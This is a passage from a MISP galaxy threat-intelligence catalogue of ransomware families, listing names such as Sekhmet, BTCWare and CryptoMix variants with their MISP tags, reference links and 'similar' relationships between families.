https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/

https://www.cybersecurity-insiders.com/ransomware-attack-makes-cwt-pay-4-5-million-in-bitcoins-to-hackers/

Sekhmet

Ransom.Sekhmet not only encrypts a victims files, but also threatens to publish them.

The tag is: misp-galaxy:ransomware="Sekhmet"

Sekhmet has relationships with:

  • similar: misp-galaxy:ransomware="Egregor" with estimative-language:likelihood-probability="likely"

Table 8583. Table References

Links

https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/

https://www.zdnet.com/article/as-maze-ransomware-group-retires-clients-turn-to-sekhmet-ransomware-spin-off-egregor/

https://blog.malwarebytes.com/detections/ransom-sekhmet/

https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/

$$$

Ransomware

The tag is: misp-galaxy:ransomware="$$$"

$ucyLocker

Ransomware

The tag is: misp-galaxy:ransomware="$ucyLocker"

10001

Ransomware

The tag is: misp-galaxy:ransomware="10001"

05250lock

Ransomware

The tag is: misp-galaxy:ransomware="05250lock"

0kilobypt

Ransomware

The tag is: misp-galaxy:ransomware="0kilobypt"

1337-Locker

Ransomware

The tag is: misp-galaxy:ransomware="1337-Locker"

24H

Ransomware

The tag is: misp-galaxy:ransomware="24H"

3nCRY

Ransomware

The tag is: misp-galaxy:ransomware="3nCRY"

4rw5w

Ransomware

The tag is: misp-galaxy:ransomware="4rw5w"

5ss5c(5ss5cCrypt)

Ransomware

The tag is: misp-galaxy:ransomware="5ss5c(5ss5cCrypt)"

777(Legion)

Ransomware

The tag is: misp-galaxy:ransomware="777(Legion)"

7h9r

Ransomware

The tag is: misp-galaxy:ransomware="7h9r"

7z Portuguese

Ransomware

The tag is: misp-galaxy:ransomware="7z Portuguese"

AAC

Ransomware

The tag is: misp-galaxy:ransomware="AAC"

ABCLocker

Ransomware

The tag is: misp-galaxy:ransomware="ABCLocker"

Adonis

Ransomware

The tag is: misp-galaxy:ransomware="Adonis"

AepCrypt

Ransomware

The tag is: misp-galaxy:ransomware="AepCrypt"

AES-Matrix

Ransomware

The tag is: misp-galaxy:ransomware="AES-Matrix"

AES-NI: April Edition

Ransomware

The tag is: misp-galaxy:ransomware="AES-NI: April Edition"

Afrodita

Ransomware

The tag is: misp-galaxy:ransomware="Afrodita"

Alco

Ransomware

The tag is: misp-galaxy:ransomware="Alco"

AllCry

Ransomware

The tag is: misp-galaxy:ransomware="AllCry"

AlldataLocker

Ransomware

The tag is: misp-galaxy:ransomware="AlldataLocker"

Amnesia

Ransomware

The tag is: misp-galaxy:ransomware="Amnesia"

Amnesia-2

Ransomware

The tag is: misp-galaxy:ransomware="Amnesia-2"

Anatova

Ransomware

The tag is: misp-galaxy:ransomware="Anatova"

AnDROid

Ransomware

The tag is: misp-galaxy:ransomware="AnDROid"

AngryKite

Ransomware

The tag is: misp-galaxy:ransomware="AngryKite"

AnimusLocker

Ransomware

The tag is: misp-galaxy:ransomware="AnimusLocker"

Annabelle

Ransomware

The tag is: misp-galaxy:ransomware="Annabelle"

Annabelle 2.1

Ransomware

The tag is: misp-galaxy:ransomware="Annabelle 2.1"

AnonCrack

Ransomware

The tag is: misp-galaxy:ransomware="AnonCrack"

AnonPop

Ransomware

The tag is: misp-galaxy:ransomware="AnonPop"

AnteFrigus

Ransomware

The tag is: misp-galaxy:ransomware="AnteFrigus"

Anti-DDos

Ransomware

The tag is: misp-galaxy:ransomware="Anti-DDos"

Antihacker2017

Ransomware

The tag is: misp-galaxy:ransomware="Antihacker2017"

Anubi NotBTCWare

Ransomware

The tag is: misp-galaxy:ransomware="Anubi NotBTCWare"

Apocalypse-Missing

Ransomware

The tag is: misp-galaxy:ransomware="Apocalypse-Missing"

ApolloLocker

Ransomware

The tag is: misp-galaxy:ransomware="ApolloLocker"

Argus

Ransomware

The tag is: misp-galaxy:ransomware="Argus"

Armage

Ransomware

The tag is: misp-galaxy:ransomware="Armage"

Armageddon

Ransomware

The tag is: misp-galaxy:ransomware="Armageddon"

ArmaLocky

Ransomware

The tag is: misp-galaxy:ransomware="ArmaLocky"

Arsium

Ransomware

The tag is: misp-galaxy:ransomware="Arsium"

Assembly

Ransomware

The tag is: misp-galaxy:ransomware="Assembly"

Ataware

Ransomware

The tag is: misp-galaxy:ransomware="Ataware"

Atchbo

Ransomware

The tag is: misp-galaxy:ransomware="Atchbo"

ATLAS

Ransomware

The tag is: misp-galaxy:ransomware="ATLAS"

Australian-AES

Ransomware

The tag is: misp-galaxy:ransomware="Australian-AES"

AutoEncryptor

Ransomware

The tag is: misp-galaxy:ransomware="AutoEncryptor"

AutoWannaCryV2

Ransomware

The tag is: misp-galaxy:ransomware="AutoWannaCryV2"

Auuahk-Ouuohk

Ransomware

The tag is: misp-galaxy:ransomware="Auuahk-Ouuohk"

AVCrypt

Ransomware

The tag is: misp-galaxy:ransomware="AVCrypt"

AxCrypter

Ransomware

The tag is: misp-galaxy:ransomware="AxCrypter"

aZaZeL

Ransomware

The tag is: misp-galaxy:ransomware="aZaZeL"

BadEncript

Ransomware

The tag is: misp-galaxy:ransomware="BadEncript"

Balbaz

Ransomware

The tag is: misp-galaxy:ransomware="Balbaz"

Baliluware

Ransomware

The tag is: misp-galaxy:ransomware="Baliluware"

Bam!

Ransomware

The tag is: misp-galaxy:ransomware="Bam!"

BananaCrypt

Ransomware

The tag is: misp-galaxy:ransomware="BananaCrypt"

BancoCrypt HT

Ransomware

The tag is: misp-galaxy:ransomware="BancoCrypt HT"

Barack Obama’s EBBV

Ransomware

The tag is: misp-galaxy:ransomware="Barack Obama’s EBBV"

Basilisque Locker

Ransomware

The tag is: misp-galaxy:ransomware="Basilisque Locker"

BASS-FES

Ransomware

The tag is: misp-galaxy:ransomware="BASS-FES"

BB

Ransomware

The tag is: misp-galaxy:ransomware="BB"

BeethoveN

Ransomware

The tag is: misp-galaxy:ransomware="BeethoveN"

BestChangeRu

Ransomware

The tag is: misp-galaxy:ransomware="BestChangeRu"

BigBossHorse

Ransomware

The tag is: misp-galaxy:ransomware="BigBossHorse"

Birbware

Ransomware

The tag is: misp-galaxy:ransomware="Birbware"

BitCrypt

Ransomware

The tag is: misp-galaxy:ransomware="BitCrypt"

BitCrypt 2.0

Ransomware

The tag is: misp-galaxy:ransomware="BitCrypt 2.0"

BitKangoroo

Ransomware

The tag is: misp-galaxy:ransomware="BitKangoroo"

BitPyLock

Ransomware

The tag is: misp-galaxy:ransomware="BitPyLock"

Bitshifter

Ransomware

The tag is: misp-galaxy:ransomware="Bitshifter"

BKRansomware

Ransomware

The tag is: misp-galaxy:ransomware="BKRansomware"

Black Feather

Ransomware

The tag is: misp-galaxy:ransomware="Black Feather"

BlackFireEye

Ransomware

The tag is: misp-galaxy:ransomware="BlackFireEye"

BlackHat-Mehtihack

Ransomware

The tag is: misp-galaxy:ransomware="BlackHat-Mehtihack"

BlackKingdom

Ransomware

The tag is: misp-galaxy:ransomware="BlackKingdom"

BlackMist

Ransomware

The tag is: misp-galaxy:ransomware="BlackMist"

Blackout

Ransomware

The tag is: misp-galaxy:ransomware="Blackout"

BlackPink

Ransomware

The tag is: misp-galaxy:ransomware="BlackPink"

BlackRose

Ransomware

The tag is: misp-galaxy:ransomware="BlackRose"

BlackSheep

Ransomware

The tag is: misp-galaxy:ransomware="BlackSheep"

Black Worm

Ransomware

The tag is: misp-galaxy:ransomware="Black Worm"

Blank

Ransomware

The tag is: misp-galaxy:ransomware="Blank"

Blind

Ransomware

The tag is: misp-galaxy:ransomware="Blind"

Blitzkrieg

Ransomware

The tag is: misp-galaxy:ransomware="Blitzkrieg"

BlockFile12

Ransomware

The tag is: misp-galaxy:ransomware="BlockFile12"

BloodJaws

Ransomware

The tag is: misp-galaxy:ransomware="BloodJaws"

Blooper

Ransomware

The tag is: misp-galaxy:ransomware="Blooper"

BlueCheeser

Ransomware

The tag is: misp-galaxy:ransomware="BlueCheeser"

Bluerose

Ransomware

The tag is: misp-galaxy:ransomware="Bluerose"

BOK

Ransomware

The tag is: misp-galaxy:ransomware="BOK"

BoooamCrypt

Ransomware

The tag is: misp-galaxy:ransomware="BoooamCrypt"

BooM

Ransomware

The tag is: misp-galaxy:ransomware="BooM"

Boris HT

Ransomware

The tag is: misp-galaxy:ransomware="Boris HT"

BrainLag

Ransomware

The tag is: misp-galaxy:ransomware="BrainLag"

BRansomware

Ransomware

The tag is: misp-galaxy:ransomware="BRansomware"

Brick

Ransomware

The tag is: misp-galaxy:ransomware="Brick"

BrickR

Ransomware

The tag is: misp-galaxy:ransomware="BrickR"

BtcKING

Ransomware

The tag is: misp-galaxy:ransomware="BtcKING"

BTCWare-Aleta

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Aleta"

BTCWare-Gryphon

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Gryphon"

BTCWare-Master

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Master"

BTCWare-Nuclear

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Nuclear"

BTCWare-Onyon

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Onyon"

BTCWare-PayDay

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-PayDay"

BTCWare-Wyvern

Ransomware

The tag is: misp-galaxy:ransomware="BTCWare-Wyvern"

Bud

Ransomware

The tag is: misp-galaxy:ransomware="Bud"

BugWare

Ransomware

The tag is: misp-galaxy:ransomware="BugWare"

BulbaCrypt HT

Ransomware

The tag is: misp-galaxy:ransomware="BulbaCrypt HT"

BWall

Ransomware

The tag is: misp-galaxy:ransomware="BWall"

C0hen Locker

Ransomware

The tag is: misp-galaxy:ransomware="C0hen Locker"

CA$HOUT

Ransomware

The tag is: misp-galaxy:ransomware="CA$HOUT"

CainXPii

Ransomware

The tag is: misp-galaxy:ransomware="CainXPii"

Cephalo

Ransomware

The tag is: misp-galaxy:ransomware="Cephalo"

Cerberos

Ransomware

The tag is: misp-galaxy:ransomware="Cerberos"

Charmant

Ransomware

The tag is: misp-galaxy:ransomware="Charmant"

Chekyshka

Ransomware

The tag is: misp-galaxy:ransomware="Chekyshka"

ChernoLocker

Ransomware

The tag is: misp-galaxy:ransomware="ChernoLocker"

ChinaYunLong

Ransomware

The tag is: misp-galaxy:ransomware="ChinaYunLong"

Christmas

Ransomware

The tag is: misp-galaxy:ransomware="Christmas"

ClicoCrypter

Ransomware

The tag is: misp-galaxy:ransomware="ClicoCrypter"

ClicoCrypter-2

Ransomware

The tag is: misp-galaxy:ransomware="ClicoCrypter-2"

Clouded

Ransomware

The tag is: misp-galaxy:ransomware="Clouded"

Cmd

Ransomware

The tag is: misp-galaxy:ransomware="Cmd"

Codemanager

Ransomware

The tag is: misp-galaxy:ransomware="Codemanager"

Coin Locker

Ransomware

The tag is: misp-galaxy:ransomware="Coin Locker"

Comrade HT

Ransomware

The tag is: misp-galaxy:ransomware="Comrade HT"

CoNFicker

Ransomware

The tag is: misp-galaxy:ransomware="CoNFicker"

Coom

Ransomware

The tag is: misp-galaxy:ransomware="Coom"

CorruptCrypt

Ransomware

The tag is: misp-galaxy:ransomware="CorruptCrypt"

Creeper

Ransomware

The tag is: misp-galaxy:ransomware="Creeper"

Creepy

Ransomware

The tag is: misp-galaxy:ransomware="Creepy"

Cripton

Ransomware

The tag is: misp-galaxy:ransomware="Cripton"

Cripton7zp

Ransomware

The tag is: misp-galaxy:ransomware="Cripton7zp"

Cry36

Ransomware

The tag is: misp-galaxy:ransomware="Cry36"

Cry9

Ransomware

The tag is: misp-galaxy:ransomware="Cry9"

CryCipher

Ransomware

The tag is: misp-galaxy:ransomware="CryCipher"

CryCipher is also known as:

  • PayPalGenerator2019

CryForMe

Ransomware

The tag is: misp-galaxy:ransomware="CryForMe"

Crying

Ransomware

The tag is: misp-galaxy:ransomware="Crying"

CryMore

Ransomware

The tag is: misp-galaxy:ransomware="CryMore"

Cryp70n1c

Ransomware

The tag is: misp-galaxy:ransomware="Cryp70n1c"

Crypt0 HT

Ransomware

The tag is: misp-galaxy:ransomware="Crypt0 HT"

Crypt0

Ransomware

The tag is: misp-galaxy:ransomware="Crypt0"

Crypt0L0cker

Ransomware

The tag is: misp-galaxy:ransomware="Crypt0L0cker"

Crypt0r

Ransomware

The tag is: misp-galaxy:ransomware="Crypt0r"

Crypt12

Ransomware

The tag is: misp-galaxy:ransomware="Crypt12"

CryptFuck

Ransomware

The tag is: misp-galaxy:ransomware="CryptFuck"

CryptGh0st

Ransomware

The tag is: misp-galaxy:ransomware="CryptGh0st"

Crypto_Lab

Ransomware

The tag is: misp-galaxy:ransomware="Crypto_Lab"

CryptoApp

Ransomware

The tag is: misp-galaxy:ransomware="CryptoApp"

Crypto-Blocker

Ransomware

The tag is: misp-galaxy:ransomware="Crypto-Blocker"

CryptoBoss

Ransomware

The tag is: misp-galaxy:ransomware="CryptoBoss"

CryptoCat

Ransomware

The tag is: misp-galaxy:ransomware="CryptoCat"

CryptoClone

Ransomware

The tag is: misp-galaxy:ransomware="CryptoClone"

CryptoDark

Ransomware

The tag is: misp-galaxy:ransomware="CryptoDark"

CryptoGod 2017

Ransomware

The tag is: misp-galaxy:ransomware="CryptoGod 2017"

CryptoGod 2018

Ransomware

The tag is: misp-galaxy:ransomware="CryptoGod 2018"

CryptoLite

Ransomware

The tag is: misp-galaxy:ransomware="CryptoLite"

CryptolockerEmulator

Ransomware

The tag is: misp-galaxy:ransomware="CryptolockerEmulator"

CryptoLockerEU 2016

Ransomware

The tag is: misp-galaxy:ransomware="CryptoLockerEU 2016"

CryptoManiac

Ransomware

The tag is: misp-galaxy:ransomware="CryptoManiac"

CryptoMix-0000

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-0000"

CryptoMix-0000 has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Arena

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Arena"

CryptoMix-Arena has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Azer

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Azer"

CryptoMix-Azer has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Backup

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Backup"

CryptoMix-Backup has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-CK

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-CK"

CryptoMix-CK has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Coban

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Coban"

CryptoMix-Coban has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-DLL

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-DLL"

CryptoMix-DLL has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

